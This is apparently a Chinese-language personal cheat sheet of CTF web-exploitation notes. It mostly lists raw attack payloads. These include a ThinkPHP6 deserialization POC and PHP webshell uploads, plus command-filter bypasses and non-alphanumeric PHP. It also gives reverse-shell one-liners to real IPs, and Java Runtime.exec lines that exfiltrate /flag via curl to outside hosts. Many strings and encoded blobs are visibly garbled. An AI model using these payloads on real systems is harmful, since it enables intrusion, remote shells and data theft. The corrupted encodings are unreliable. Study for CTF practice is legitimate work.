乱七八糟的一些web记录（纯备份用）

2025-07-27 20:09:24

目录 thinkphp6 python反编译 Web题目 ssl注入 RCE 字符长度限制 7字符长度某个字母被ban的绕过方法 ping题目不含数字和字母的提权题目 upload题目：字符绕过 ool注入 Sql注入更新段表注入1： Handle注入布尔盲注特殊方法测试列数堆叠注入常见绕过 Flas

thinkphp6

python反编译

Web题目

ssl注入

RCE

字符长度限制

7字符长度

某个字母被ban的绕过方法

ping题目

不含数字和字母的

提权题目

upload题目：

字符绕过

ool注入

Sql注入

更新段表

注入1：

Handle注入

布尔盲注

特殊方法

测试列数

堆叠注入

常见绕过

Flask题目

flask的ping值计算

Flask例题

git题目

java题目

Jwt题目

XXE题目

SSRF题目

file协议

dict协议

gopher协议

打mysql无密码

mysql读取任意文件漏洞

写马

基于UIO联合查询： #

非联合查询 #

mysql进行root权限提取

打redis

主从复制redis

dict协议分步解决：

http/s协议：探测内网主机存活

SSTL题目

twig模板

smarty

jinjia

沙盒逃逸

字符长度限制

globals()函数

Byte代替char

****绕过方式

_posixsubprocess绕过

****多次输入

****单次输入

随机数

****输出流重定向

XSS专题

****过滤img

****过滤script

ode.js题目

1.包含eval内利用

js中的拼接问题：

.长度字符限制数组异常绕过

原型链污染

普通变量相等绕过

升级rce绕过

函数套函数

ejs模板rce

pear包含

打php-rfm

函数使用

非法传参名

python用法

pickle反序列化题目

Php题目

心得：

Pear包含

****方法一：远程文件下载（下载远程木马到本地）

****方法二：生成配置文件，配置项传入我们恶意的php代码的形式

****方法三：写配置文件方式

函数总结

basename()

parse_url

file_get_content()

file_put_contents()

getip()

Include()

intval

Is_number()

Pathinfo()

toLowerCase

toUpperCase

Array_search

Call_user_func

putenv

prase_str()

Strpos()

escapeshellcmd

escapeshellarg() escapeshellcmd()

Exit（）

Data()

Create_function()

Yaml.load()

$_REQUEST

$_SERVER[ QUERY_STRIG ]

toUpperCase()

toLowerCase():

fastcgi_pass

反序列化题目：

字符逃逸

Destruct触发

· *字符过滤绕过：*函数名, 方法名, 类名不区分大小写

绕过throw new Exception 强制GC回收执行__destruct()函数

Fastapi

综合例题

常见问题

src挖洞之路：

查询平台：

sql漏洞：

so文件编译

gcc  -o hook.so -fPIC -shared -ldl -D_GU_SOURCE

thinkphp漏洞分析与总结 · Drunkmars s Blog

thinkphp6

poc

<?php /** * Created by PhpStorm. * User: wh1tP1g */ namespace think\model\concern { trait Conversion{ protected $visible; } trait RelationShip{ private $relation; } trait Attribute{ private $withAttr; private $data; protected $type; } trait ModelEvent{ protected $withEvent; } } namespace think { abstract class Model{ use model\concern\RelationShip; use model\concern\Conversion; use model\concern\Attribute; use model\concern\ModelEvent; private $lazySave; private $exists; private $force; protected $connection; protected $suffix; function ctruct($obj) { if($obj == null){ $this->data = array(wh1tp1g=>whoami); $this->relation = array(wh1tp1g=>[]); $this->visible= array(wh1tp1g=>[]); $this->withAttr = array(wh1tp1g=>system); }else{ $this->lazySave = true; $this->withEvent = false; $this->exists = true; $this->force = true; $this->data = array(wh1tp1g=>[]); $this->connection = mysql; $this->suffix = $obj; } } } } namespace think\model { class Pivot extends \think\Model{ function ctruct($obj) { parent::__ctruct($obj); } } } namespace { $pivot1 = new \think\model\Pivot(null); $pivot2 = new \think\model\Pivot($pivot1); echo base64_encode(serialize($pivot2));

POST /user/upload/upload HTTP/1.1
Host: 8180dbac-b11b-41d5-a2cd-4a04a2797e0.
Cookie: PHPSESSID=7901b5229557c94bad46e16af2a728
Content-Length: 894
Sec-Ch-Ua:  ot;A Brand;v=99, Google Chrome;v=97, Chromium;v=97
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows T 10.0; Win64; x64) AppleWebKit/57.6 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/57.6
Sec-Ch-Ua-Platform: Windows
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-C,zh;q=0.9,ja-C;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name=id

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name=name

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name=type

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name=lastModifiedDate

Wed Jul 21 2021 18:15:25 GMT0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name=size

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name=file; filename=test.php
Content-Type: image/jpeg

JFIF
<?php phpinfo();?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

python反编译

uncompyle6 ../pyc/pyc > ../pyc/utils.py

Web题目

常见trick：

1.绕过；&、|、||、%0a、%0d

2.读取就要想到伪协议

.文件下载想到任意文件跨目录读取

下面三个url解码后md5()后相同

点击展开代码块

$s1 = %af%1%76%70%82%a0%a6%58%cb%e%2%8%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%1%d%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c%8f%9%e%52%7%7%5%a0%5f%69%ef%c%b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%6%95%da%ee%1%bc%fb%7e%a%59%45%ef%25%67%c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%7%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%1%05%d1%15%7d%c4%5e%bc%0b%0f%21%2%a4%96%7c%17%12%d1%2b%b%10%b7%7%60%68%d7%cb%5%5a%54%97%08%0d%54%78%49%d0%9%c%b%fd%1f%0b%5%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%c%85%97%1e%f6%8%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%5%4f%0a%5c%4%d%7%a5%98%f7%66%72%aa%4%e%bd%a2%cd%62%fd%69%1d%4%0%57%52%ab%41%b1%91%65%f2%0%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%9%40%1a%1%d1%09%c5%e0%f7%87%5f%48%e7%d7%b%62%04%a7%c4%cb%fd%f4%ff%cf%b%74%28%1c%96%8e%09%7%a%9b%a6%2f%ed%b7%99%d5%b9%05%9%95%ab

$s2 = %af%1%76%70%82%a0%a6%58%cb%e%2%8%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%1%d%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c%8f%9%e%52%7%7%5%a0%5f%69%ef%c%b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%6%95%da%ee%1%bc%fb%7e%a%59%45%ef%25%67%c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%7%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%1%05%d1%15%7d%c4%5e%bc%0b%0f%21%2%a4%96%7c%17%12%d1%2b%b%10%b7%7%60%68%d7%cb%5%5a%54%97%08%0d%54%78%49%d0%9%c%b%fd%1f%0b%5%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%c%85%97%1e%f6%8%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%5%4f%0a%5c%4%d%f%a5%98%f7%66%72%aa%4%e%bd%a2%cd%62%fd%e9%1d%4%0%57%52%ab%41%b1%91%65%f2%0%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%1%40%1a%1%d1%09%c5%e0%f7%87%5f%48%e7%d7%b%62%04%a7%c4%cb%fd%f4%ff%cf%b%74%a8%1b%96%8e%09%7%a%9b%a6%2f%ed%b7%99%d5%9%05%9%95%ab

$s = %af%1%76%70%82%a0%a6%58%cb%e%2%8%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%1%d%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c%8f%9%e%52%7%7%5%a0%5f%69%ef%c%b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%6%95%da%ee%1%bc%fb%7e%a%59%45%ef%25%67%c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%7%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%1%05%d1%15%7d%c4%5e%bc%0b%0f%21%2%a4%16%7c%17%12%d1%2b%b%10%b7%7%60%68%d7%cb%5%5a%54%97%08%0d%54%78%49%d0%9%c%%fd%1f%0b%5%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%c%85%97%1e%f6%8%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%5%4f%0a%5c%4%d%7%a5%98%f7%66%72%aa%4%e%bd%a2%cd%62%fd%69%1d%4%0%57%52%ab%41%b1%91%65%f2%0%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%9%40%1a%1%d1%09%c5%e0%f7%87%5f%48%e7%d7%b%62%04%a7%c4%cb%fd%f4%ff%cf%b%74%28%1c%96%8e%09%7%a%9b%a6%2f%ed%b7%99%d5%b9%05%9%95%ab

绕过八进制 010574

0代表是八进制,0和 0都可以

十六进制0x

在弱类型比较的时候，4476e12是科学计数法4476*10^12，而在intval函数中，遇到字母就停止读取，因此是4476，成功绕过，非常巧妙。

php://filter/read=string.rot1/newstar/resource=flag.php

Php协议读取

第一次vim会创建缓存的交换文件名为 .index.php.swp，

再次意外退出后，将会产生名为 .index.php.swo 的交换文件，

第三次产生的交换文件则为 .index.php.swn。

XFF可控，

*Flask可能存在*Jinjia2模版注入漏洞

*PHP可能存在*Twig模版注入漏洞

本地登陆

X-Forwarded: 127.0.0.1

Forwarded-For: 127.0.0.1

Forwarded: 127.0.0.1

X-Requested-With: 127.0.0.1

X-Forwarded-Proto: 127.0.0.1

X-Forwarded-Host: 127.0.0.1

X-remote-IP: 127.0.0.1

X-remote-addr: 127.0.0.1

True-Client-IP: 127.0.0.1

X-Client-IP: 127.0.0.1

Client-IP: 127.0.0.1

X-Real-IP: 127.0.0.1

Ali-CD-Real-IP: 127.0.0.1

Cdn-Src-Ip: 127.0.0.1

Cdn-Real-Ip: 127.0.0.1

CF-Connecting-IP: 127.0.0.1

X-Cluster-Client-IP: 127.0.0.1

WL-Proxy-Client-IP: 127.0.0.1

Proxy-Client-IP: 127.0.0.1

Fastly-Client-Ip: 127.0.0.1

True-Client-Ip: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Host: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

从哪访问：Referer

服务ip：via

邮箱：FROM

$this->code==0x6d (弱比较换成十进制数也可）

system不能用可以换shell_exec

if (md5($POST[ a ]) === md5($POST[ b ]))数组绕过

ls /|tee xxx 也可以写文件，再用nl打开

ctfshow::getflag 直接调用方法

ctfshow[0]=ctfshow&ctfshow[1]=getFlag

冒号过滤可以尝试数组绕过，前面属性后面方法名

call_user_func(array($classname, say_hello ));

?1=session_start

?1=error_reporting

?1=json_last_error

能返回一正确（true）值绕过==弱比较

?1=spl_autoload_extensi生成 .inc,.php 文件(shell文件)

通过替换实现内存占用放大，超过php最大默认内存256M即可造成变量定义失败

Str_repalce

已经拿过flag，题目正常,也就是说...可以看日志

配置文件 /etc/nginx/

访问日志 /var/log/nginx/access.log

file:///etc/nginx/conf.d/

?page=/var/log/nginx/access.log ?page=/var/log/nginx/error.log ?page=/etc/nginx/

依赖进程，思路可以是读 /proc/self/maps

Md5专题

if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2))

数组绕过

if ($a != $b && md5($a) == md5($b))

a=s1885207154a，b=s186677006a

if ($a != $b && md5($a) == md5(md5($b))

a=s1885207154a，b=V5VDSHva7fjyJoJIQl

if( ($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b)) )

A=1 b=’1’;

if((string)$GET[ a ] !== (string)$GET[ b ] && md5($GET[ a ])===md5($GET[ b ])){

s1=%4d%c9%68%ff%0e%e%5c%20%95%72%d4%77%7b%72%15%87%d%6f%a7%b2%1b%dc%56%b7%4a%d%c0%78%e%7b%95%18%af%bf%a2%00%a8%28%4b%f%6e%8e%4b%55%b%5f%42%75%9%d8%49%67%6d%a0%d1%55%5d%8%60%fb%5f%07%fe%a2

&s2=%4d%c9%68%ff%0e%e%5c%20%95%72%d4%77%7b%72%15%87%d%6f%a7%b2%1b%dc%56%b7%4a%d%c0%78%e%7b%95%18%af%bf%a2%02%a8%28%4b%f%6e%8e%4b%55%b%5f%42%75%9%d8%49%67%6d%a0%d1%d5%5d%8%60%fb%5f%07%fe%a2

$md5==md5(md5($md5))

0e118100474

a==md5($a)

0e215962017

md5( 240610708 ) == md5( QKCDZO )

加密后带单引号’

ffifdyop

e58

461168605257674264

加1

1e<202 1e71>202

%0a绕过#注释符号

ssl注入

特征：shtml文件

RCE

4,5,7绕过

字符长度限制

7字符长度

trick：nl /*>1

拆解绕过

echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php

<?php eval（$_GET[1]);

import requests
import time

url = http://show/api/tools.php
with open(, r) as f:
    for i in f:
        data = {cmd: i.strip()}
        r = requests.post(url=url, data=data)
        time.sleep(1)#时间控制
        print()

test = requests.get(http://show/api/1.php)
if test.status_code == :
    print(you	ve got it!)

4字符绕过

cat /flag   base64:PD9waHAgcGhwaW5mbygpOw==
构造
echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==|base64 -d>1.php

某个字母被ban的绕过方法

1. 反斜线转义 cat fla\g.php
2. 两个单引号做分隔 cat fl		ag.php
. base64编码绕过 echo Y2F0IGZsYWcucGhw | base64 -d | sh
4. hex编码绕过 echo 6617420666c61672e706870 | xxd -r -p | bash
5. glob通配符 cat f[k-m]ag.php  cat f[l]ag.php
6. ?和*
7. cat f{k..m}ag.php
8. 定义变量做拼接 a=g.php; cat fla$a
9. 内联执行cat `echo 666c61672e706870 | xxd -r -p` 或 cat $(echo 666c61672e706870 | xxd -r -p) 或 echo 666c61672e706870 | xxd -r -p | xargs cat

10.指定字符

拼接执行

| echo YmFzaCAtYyAnYmFzaCAtaSAJiAvZGV2LRjcC81aTc4MTk2MAyLnlpYAuZnVuLzU4MjY1IDAJjEn | base64 -d | bash |

if(preg_match(	/f|l|a|g/	,$a))
只过滤命令参数

function=file_get_contents&cmd=http://47.99.125.16/.php
都过率

function=strtolower&cmd=show_source(chr(47).chr(102).chr(49).chr(97).chr(10));

More `php -r echo chr(102).chr(49).chr(97).chr(10);`

ls / |script  写入

Eval函数

使用system一般有回显，`ls`一般要用echo来输出

无回显问题：

python -m http.server 80 	开启监听

php -S localhost:8000   linux 启动php

nc -lp 99

nc 47.99.125.16 89 -e /bin/bash
nc 47.99.125.16 89 -e /bin/sh

echo YmFzaCAtYyAnYmFzaCAtaSAJiAvZGV2LRjcC80y45OS4xMjUuMTYvMzM4OSAgMD4mMSc= | base64 -d | bash 
a	;CALL SHELLEXEC(	bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSAJiAvZGV2LRjcC80y45OS4xMjUuMTYvMzM4OSAgMD4mMSc=}|{base64,-d}|{bash,-i}	);--



echo bash -c 	bash -i >& /dev/tcp/49.22.224.59/89  0>&1	 | base64 -d | bash |

bash -c 	exec bash -i &>/dev/tcp/49.22.224.59/89 <&1	
反弹shell

.可以被。代替

curl 192.168.74.129/12		访问

Curl    -T  /tmp/Syclover  传输数据

             -o  shell.php  下载文件到
 -o  shell.php 
curl  https://haxx.in/files/  -o 

Curl  -t 192.169.1.1 /flag      极客大挑战202 Web方向题解wp 全-CSD博客.html

?url=http://ip:17/	 -F file=@/flag

查看端口进程：

`lsof -i :<port>

ping题目

冒号过滤 ----%0a代替

$(**printf \154\16)** 执行ls --绕过反引号``

思路：

黑名单绕过rce，用16进制编码绕过：aaa=hex2bin( 779774656d )( uniq /f* );

日志替换

/var/log/nginx/access.log

学到了sed p /e-g* ;这种读文件的方法，转换下sed p /e-g* ;就相当于cat /flag了

nl ->uniq

空格${IFS}

#可以使用mv将flag.php文件移动到其他文件然后访问文件拿到flag ?c=mv${IFS}fla?.php${IFS}

$(())是0

$((~$(())))是-1

$(($((~$(())))$((~$(())))))是-2

读取文件

c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

data://text/plain;base64,PD9waHAgclzdGVtKCdjYXQgZmxhZy5waHAnKTs=

文件日志包含再用include

c=var_export(scandir(/));exit();

Eval闭合?>

c=highlight_file(/flag.php); c=include(/); c=require(/); c=include_once(/); c=require_once(/);

有Include函数包含，在require包含会跳过，这里绕过使用

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

--requice跳过

c=$a=opendir( / );while(($file = readdir($a)) !=false){echo $file. ;}

c=$a=new DirectoryIterator( glob:///* );foreach($a as $f){echo($f->__toString(). );} #扫描根目录有什么文件

c=$a=new DirectoryIterator( glob:///* );foreach($a as $f){echo($f->getFilename(). );}

读取根目录文件

1、查看源码以后发现在最后输出的环节，他将数字和字母全部都转换为了“?”号，可以通过“exit();”，将后续代码闭合。

2、扫描目录：

c=$a=opendir( / );while(($file=readdir($a)) != false) {echo $file.;}exit();

passthru(“ls /“);

****无参数读取

//此处我用的官方wp的exp脚本

/?exp=eval(file_put_contents(1.php,base64_decode($_POST[ a ])));

POST:

a=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwojIFBvcnQgc2hbgpmbIoJGk9MDskaTw2TUzTskaS

srKSB7CiAgJHQ9cRyZWFtXvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaW

YoJGVlMiA9PT0gIkFkZHJlcMgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9Cg==

****扫描可用端口

var_dump(get_cfg_var(disable_functi));

var_dump(get_cfg_var(open_basedir));

var_dump(ini_get_all());相关配置信息

get_loaded_extensi()查看所有编译并加载的模块

highlight_file(array_rand(array_flip(scandir(getcwd())))); //查看和读取当前目录文件

print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件

print_r(scandir(next(scandir(getcwd())))); //查看上一级目录的文件

show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd()))))))); //读取上级目录文件

show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));//读取上级目录文件

show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));//读取上级目录文件

show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));//这个得爆破，不然手动要刷新很久，如果文件是正数或倒数第一个第二个最好不过了，直接定位

//查看和读取根目录文件

print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

show_source(array_rand(array_flip(scandir(chr(ord(strrev(crypt(serialize(array())))))))));

$a->lover=mkdir( a );chdir( a );ini_set( open_basedir , .. );chdir( .. );chdir( .. );chdir( .. );chdir( .. );chdir( .. );ini_set( open_basedir , / );print_r(scandir( . ));;

$a->lover=mkdir( a );chdir( a );ini_set( open_basedir , .. );chdir( .. );chdir( .. );chdir( .. );chdir( .. );chdir( .. );ini_set( open_basedir , / );print_r(scandir( . ));readfile( f1ger );

echo file_get_contents(/ctfshowflag);

//查看和读取根目录文件

————————————————=>获得路径为/var/html

?code = print_r(getcwd());

=>查看路径下内容没有可用的

?code = print_r(scandir(getcwd()))

=>探测上一级为Array ( [0] => . [1] => .. [2] => flag_phpbyp4ss [] => html )

?code = print_r(scandir(dirname(getcwd())))

=>发现flag文件，进行读取

?code = readfile(next(array_reverse(scandir(dirname(getcwd())))))

=>发现报错，不存在flag_phpbyp4ss文件，更改工作目录

?code = readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))))

拿到数组最后一个

show_source(end(scandir(getcwd())));

get_defined_vars ( void ) : array 返回由所有已定义变量所组成的数组

?code=eval(end(current(get_defined_vars())));&b=phpinfo();

不含数字和字母的

$=[];$=@$;$=$[ ! == @ ];$___=$;$=$_;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$_.=$;$_.=$;$=$;$;$;$;$;$_.=$;$__=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$_.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$_.=$;$__= ;$=$_;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$__.=$__;$=$$;$__($[_]);

低版本木马多用assert(eval($_POST[test]))

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%9%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);

绕过disablefunction用蚂蚁🗡

提权题目

find / -perm -u=s -type f 2>/dev/null    //查看具有suid权限的命令

find / -perm -4000 2>/dev/null     //这个也可以

定时触发可能有定时任务 cat /etc/crontab

lsb_release -a，列出所有linux系统版本信息
nginx -v，列出nginx版本信息

pkexec --version

查看版本

grep -rl SS** /path/to/search 查指定内容

find / -type f -exec grep -l SSCTF{ {}

Auto_prepend_file phpinfo

多重变量覆盖extract尝试session_id=session_id

${}执行代码

eval

assert

preg_replace

create_function()

array_map()

call_user_func()/call_user_func_array()

array_filter()

usort(),uasort()

upload题目：

多文件包含

POST / HTTP/1.1

 Content-type: multipart/form-data;boundary=--------------------------55split 

User-Agent: Firefox 

Accept: */* Host: 192.168.1.11 

Accept-Encoding: gzip, deflate 

Connection: close 

Content-Length: 62 

 ----------------------------55split 

Content-Disposition: form-data; name=; filename=1.py 

Content-Type: application/octet-stream  

HWO 

----------------------------55split 

Content-Disposition: form-data; name=flag 

Content-Type: application/octet-stream 

php://filter/read=convert.base64-encode/resource=flag.php 

----------------------------55split--

一句话木马：

逻辑漏洞、文件内容检测绕过

文件头是位于文件开头的一段承担一定任务的数据，一般开头标记文件类型，如gif的gif89a，或gif87a， png的x89PG\x0d\x0a,等等

php的解释器可以解析：php、php、php4、php5、php7、phtml、pht、phs、shtml、pwml~不过本题除了后两个，前面全部被waf拉黑了~

$file=1.php.1 //apache2.x解析漏洞，输入/.是不会解析的

$file=1.pwml //php解释器绕过

con=<?php @eval($_POST[cmd]);?>&file=test.php/ 递归目录会截断

Php特性：

<% echo 12 ;%> #开启配置参数asp_tags=on，并且只能在7.0以下版本使用

<? echo 12 ;?> #前提是开启配置参数short_open_tags=on

phar://协议可以读取任意后缀压缩包中的内容，如.zip。

为题目中有写文件的函数，所以可以通过file_put_contents写phar文件，然后再通过file_put_contents触发phar反序列化。当然我们得在删除文件前执行完这两个操作，所以需要用到条件竞争。

12	AddType application/x-httpd-php .xxxphp_value auto_append_file php://filter/convert.base64-decode/resource=shell.xxx

字符绕过

trick：在Linux系统下1.php.是一个合法的文件名，系统不会自动把最后的点去掉并把文件当成php文件执行，所以点绕过只在Windows下有用 1.php/.

十六进制可绕过，s改为S

// 将小s改为大S; 做处理后 \75是u的16进制，成功绕过

$a = O:4:test:1:{S:8:\75sername;s:5:admin;} ;

GET:?web=O::syc:1:{S:5:lo\76er;s:18:assert($_POST[1]);;

POST:1=要执行的代码

解决办法是将https改成http。（https太安全了呜呜呜）编码器记得选base64

Pop链条构造eval函数里面调用函数要记得system(‘ls’)****;

if( ;

if ( ; === preg_replace( /\s()?((?R)?)/ , , $var)){

****正则表达式：/[oc]:\d:/i。意思是过滤这两种情况：o:数字:与c:数字:

\W,(注意这个W是大写的)，匹配非字母、数字、下划线。等价于A-Za-z0-9_。

所以\W是对上面的\w取反: 匹配所有字母数字下划线的字母。

s 代表让 . 也可以匹配换行符。

(\s)*: 匹配零个或者多个空白字符空格制表符换页符

(\n): 匹配一个或多个换行符

/i : 匹配时不区分大小写

^\s() 表示匹配除了空格、左括号和右括号之外的任意字符。

禁用数字和小写字符，可用${IFS}这种取值，如果给出环境变量内容，利用构造nl显示.

->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>ctfshow构造{IFS} - 简书.html(117题)

%0aphp 遇到多行匹配%0a换行

POST /?ctf=a%A2%A%7Bi%A0%BO%A%A%22CCC%22%A%A%7Bs%A1%A%22a%22%B%Bs%A1%A%22c%22%BO%A%A%22AAA%22%A2%A%7Bs%A1%A%22s%22%BO%A%A%22BBB%22%A1%A%7Bs%A6%A%22%00BBB%00b%22%Bs%A20%A%22.%2F%F%F%F%2F%F%F%F%F%F%F%F%F%5B%40-%5B%5D%22%B%7Ds%A1%A%22a%22%Bs%A4%A%22eval%22%B%7Ds%A1%A%22b%22%BR%A%B%7Di%A0%B%B%7D HTTP/1.1

Host: localhost

User-Agent: python-requests/2.1.0

Accept-Encoding: gzip, deflate

Accept: /

Connection:close

Content-Length:155

Content-Type: multipart/form-data; boundary=c25447769cf9fc1afc1ede702b4279d

--c25447769cf9fc1afc1ede702b4279d

Content-Disposition: form-data; name=file; filename=file

#/bin/shcat /*

--c25447769cf9fc1afc1ede702b4279d--

POST /?ctf=O%A%A%22CCC%22%A%A%7Bs%A1%A%22c%22%BO%A%A%22AAA%22%A2%A%7Bs%A1%A%22s%22%BO%A%A%22BBB%22%A1%A%7Bs%A1%A%22b%22%Bs%A20%A%22.%2F%F%F%F%2F%F%F%F%F%F%F%F%F%5B%40-%5B%5D%22%B%7Ds%A1%A%22a%22%Bs%A9%A%22lewiserii%22%B%7Ds%A1%A%22a%22%B%Bs%A1%A%22b%22%BR%A6%B% HTTP/1.1

Host: 192.168.100.100:100

Content-Length: 186

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: ****null

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0xXn6nlxZVqh49pS

User-Agent: Mozilla/5.0 (Windows T 10.0; Win64; x64) AppleWebKit/57.6 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/57.6

Accept: text/html,application/xhtmlxml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: zh-C,zh;q=0.9,en;q=0.8

Connection: close

------WebKitFormBoundary0xXn6nlxZVqh49pS

Content-Disposition: form-data; name=file; filename=

Content-Type: text/plain

cat /f*

------WebKitFormBoundary0xXn6nlxZVqh49pS--

Set_error_handler

ool注入

java.lang.Runtime.getRuntime().exec(	curl http://`47.99.125.16/`cat /flag`	)

java.lang.Runtime.getRuntime().exec(	bash -c {echo,curl  http://`cat /flag`.os4jtkl.requestrepo/}|{base64,-d}|{bash,-i}	)

java.lang.Runtime.getRuntime().exec(	bash -c {echo,YVybCAgaHR0cDovL2BjYXQgL2ZsYWdgLm9zMzRqdGtsLnJlcXVlcRyZXBvLmvbS8=}|{base64,-d}|{bash,-i}	)

 new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(cat /flag).getInputStream())).readLine() 
     
 new java.util.Scanner(java.lang.Runtime.getRuntime().exec(	cat
/flag	).getInputStream())

利用该工具的OQL查询功能,查询password关键字得到数据库连接密码
查询语句如下:
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains(password))
或
